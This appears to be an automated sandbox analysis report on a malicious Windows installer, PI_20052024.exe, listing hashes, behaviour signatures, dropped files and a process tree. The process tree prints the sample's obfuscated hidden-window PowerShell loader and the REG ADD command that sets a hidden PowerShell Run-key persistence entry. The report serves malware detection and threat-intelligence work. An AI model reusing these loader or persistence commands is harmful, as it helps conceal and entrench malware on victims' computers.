Overview

overview

8

Static

static

3

PI_20052024.exe

windows7-x64

8

PI_20052024.exe

windows10-2004-x64

8

$PLUGINSDI...gs.dll

windows7-x64

3

$PLUGINSDI...gs.dll

windows10-2004-x64

3

$PLUGINSDI...ec.dll

windows7-x64

3

$PLUGINSDI...ec.dll

windows10-2004-x64

3

Analysis

  • max time kernel
    147s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    21-05-2024 15:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PI_20052024.exe

  • Size

    568KB

  • MD5

    e4370a31c71c37bde2e16022fa0459c2

  • SHA1

    10890db50f2aac0931eec94f45e012944efed869

  • SHA256

    49ffcfe176de375dbbb2e4d50043d80fa254ca6b4ffc6d18d9501b6d8841a436

  • SHA512

    1454935b456d4fc26b978fb4a38ec34ba673ba27ccc23c9d73328441cbdfd78baade7173eefbd2d51ffa42cd8e20697521d0128f4f08b1800293c613ac60d5af

  • SSDEEP

    12288:mH7MMIqb9BaBUbdD4aPHb2XR+MAghog0RdBBplW8Lmy:+7a69BWUhD3Ha+MPCXtlW8Lmy

Score
8/10
executionpersistence

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Loads dropped DLL 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 2 IoCs
    installer
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\PI_20052024.exe
    "C:\Users\Admin\AppData\Local\Temp\PI_20052024.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1756
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Gadgetries=Get-Content 'C:\Users\Admin\AppData\Local\nondefence\kledyrenes\mesoblastema\Kahlil\Sheriffess.Sal';$Underpricing=$Gadgetries.SubString(522,3);.$Underpricing($Gadgetries)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Loads dropped DLL
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2916
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
        3⤵
          PID:2920
        • C:\Users\Admin\AppData\Local\Temp\Reimposing.exe
          "C:\Users\Admin\AppData\Local\Temp\Reimposing.exe"
          3⤵
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of WriteProcessMemory
          PID:2752
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Thecosomatous% -windowstyle minimized $Comfortress=(Get-ItemProperty -Path 'HKCU:\Leyden\').Inlet;%Thecosomatous% ($Comfortress)"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1128
            • C:\Windows\SysWOW64\reg.exe
              REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Thecosomatous% -windowstyle minimized $Comfortress=(Get-ItemProperty -Path 'HKCU:\Leyden\').Inlet;%Thecosomatous% ($Comfortress)"
              5⤵
              • Adds Run key to start application
              • Modifies registry key
              PID:1968

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\nondefence\kledyrenes\mesoblastema\Kahlil\Anatripsology.alg
      Filesize

      324KB

      MD5

      80eec5fb391699bbe7140849c0972f95

      SHA1

      4b1663c8d3f6ee1b54d560eb21eac017fb626b99

      SHA256

      6e3604b16b56cdfb18d777d677321bce6f4d60d1e3fff8318e183b9d56bcf4dc

      SHA512

      227322fabcd05fa1e433888982f1f4f78e0185ba16dd23662133f5778fa58652571945166131cfd7f1460067784637a3170ae759744c23c8b295f7f22b474f5f

      Download Submit

    • C:\Users\Admin\AppData\Local\nondefence\kledyrenes\mesoblastema\Kahlil\Sheriffess.Sal
      Filesize

      50KB

      MD5

      197064b3c1ff1c585db3f2a0b7c2c44a

      SHA1

      f66e3acf12f2c5c120923519ec806c0eb3b40c6d

      SHA256

      c2a25450b4800c19f49a02faaf3d4d549c6ddef5c8632621fc69b3fe4c3efbd6

      SHA512

      4e17845a8a7dcd40e1aa929cd9ca9158b635aff3b2e188c28eb533c660eab6aef1ccd872c417c12b10127788e118ac17f5c6a2aad628a2de5596fe4cced58670

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\degum.lnk
      Filesize

      894B

      MD5

      34b263f0c435e8514a137ed21684fd35

      SHA1

      c10e474f80f66146622753da4c8dedb5d957c61d

      SHA256

      7df280c6528e720bfd4fce5dcee964793a5a4b91986988f23063282097b5dba6

      SHA512

      aaeb24eacb67a141aaafa2a51112b66b94b967090a685d3c99e24e35b1c47c3d57576b16431b02f950de9137ae9285e5f721dc6bde18c544db82156c563ceed7

      Download Submit

    • \Users\Admin\AppData\Local\Temp\Reimposing.exe
      Filesize

      568KB

      MD5

      e4370a31c71c37bde2e16022fa0459c2

      SHA1

      10890db50f2aac0931eec94f45e012944efed869

      SHA256

      49ffcfe176de375dbbb2e4d50043d80fa254ca6b4ffc6d18d9501b6d8841a436

      SHA512

      1454935b456d4fc26b978fb4a38ec34ba673ba27ccc23c9d73328441cbdfd78baade7173eefbd2d51ffa42cd8e20697521d0128f4f08b1800293c613ac60d5af

      Download Submit

    • \Users\Admin\AppData\Local\Temp\nso2AD9.tmp\nsDialogs.dll
      Filesize

      9KB

      MD5

      1c8b2b40c642e8b5a5b3ff102796fb37

      SHA1

      3245f55afac50f775eb53fd6d14abb7fe523393d

      SHA256

      8780095aa2f49725388cddf00d79a74e85c9c4863b366f55c39c606a5fb8440c

      SHA512

      4ff2dc83f640933162ec8818bb1bf3b3be1183264750946a3d949d2e7068ee606277b6c840193ef2b4663952387f07f6ab12c84c4a11cae9a8de7bd4e7971c57

      Download Submit

    • memory/2752-72-0x0000000000470000-0x00000000014D2000-memory.dmp

      Filesize

      16.4MB

      Download

    • memory/2916-59-0x00000000739E1000-0x00000000739E2000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2916-60-0x00000000739E0000-0x0000000073F8B000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/2916-61-0x00000000739E0000-0x0000000073F8B000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/2916-62-0x00000000739E0000-0x0000000073F8B000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/2916-66-0x0000000006590000-0x0000000009E77000-memory.dmp

      Filesize

      56.9MB

      Download

    • memory/2916-71-0x00000000739E0000-0x0000000073F8B000-memory.dmp

      Filesize

      5.7MB

      Download